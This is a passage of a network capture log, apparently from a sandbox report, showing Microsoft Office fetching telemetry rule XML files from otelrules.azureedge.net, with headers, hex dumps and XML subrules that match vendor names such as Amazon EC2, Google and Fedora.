                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:51 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 479
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                        ETag: "0x8DC582BB7D702D0"
                                                                                        x-ms-request-id: 5d62c3b8-b01e-0084-682f-2cd736000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124651Z-176bd8f9bc56k8bfhC1DFWtzvn00000000mg00000000a6gw
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:51 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        75192.168.2.44983413.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:52 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:52 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:52 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 425
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                        ETag: "0x8DC582BBA25094F"
                                                                                        x-ms-request-id: dbe51632-e01e-000c-1608-2c8e36000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124652Z-16ccfc49897z67z2hC1DFW6cd800000000g0000000009enz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:52 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        76192.168.2.44983513.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:52 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:52 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:52 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 475
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                        ETag: "0x8DC582BB2BE84FD"
                                                                                        x-ms-request-id: 7c52a88a-f01e-00aa-0993-2a8521000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124652Z-159b85dff8fqn89xhC1DFWe83c00000001c00000000067ch
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:52 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        77192.168.2.44983613.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:52 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:52 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:52 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 448
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                        ETag: "0x8DC582BB389F49B"
                                                                                        x-ms-request-id: 96ebe831-501e-007b-26b8-2b5ba2000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124652Z-16ccfc4989744mtmhC1DFWr0ts00000000tg000000001sck
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:52 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        78192.168.2.44983713.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:52 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:52 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:52 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 491
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B98B88612"
                                                                                        x-ms-request-id: 13a59a53-101e-0046-5b08-2c91b0000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124652Z-16ccfc49897rxrtbhC1DFWk40s00000000s00000000071ch
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:52 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        79192.168.2.44984013.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:52 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:53 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:52 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 415
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                        x-ms-request-id: 2f7198fb-501e-0064-2a08-2c1f54000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124652Z-16ccfc49897x7dnlhC1DFWu7ac00000000h000000000evyg
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:53 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        80192.168.2.44983913.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:52 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:53 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:52 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 479
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B989EE75B"
                                                                                        x-ms-request-id: 069b3e38-001e-0028-2008-2cc49f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124652Z-16dc884887b75prwhC1DFWfqxw00000000ng0000000000x9
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:53 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        81192.168.2.44984113.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:52 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:53 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:53 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 471
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                        ETag: "0x8DC582B97E6FCDD"
                                                                                        x-ms-request-id: bce25016-801e-0035-64b4-2a752a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124653Z-159b85dff8fprglthC1DFW8zcg000000033g000000001cm8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:53 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        82192.168.2.44984213.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:53 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:53 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:53 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                        ETag: "0x8DC582B9C710B28"
                                                                                        x-ms-request-id: 8155ec97-d01e-0049-2f2f-2ce7dc000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124653Z-159b85dff8f2qnk7hC1DFWwa2400000001kg000000009hh7
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:53 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        83192.168.2.44983813.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:53 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:53 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:53 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 416
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                        ETag: "0x8DC582BAEA4B445"
                                                                                        x-ms-request-id: 445643c3-401e-0078-193e-2c4d34000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124653Z-16dc884887b5dxtghC1DFW9q7c00000000t0000000000xbf
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:53 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        84192.168.2.44984313.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:53 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:53 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:53 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 477
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                        ETag: "0x8DC582BA54DCC28"
                                                                                        x-ms-request-id: 275a5063-901e-0048-422e-2cb800000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124653Z-176bd8f9bc59g2s2hC1DFWby1800000000qg000000009dre
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
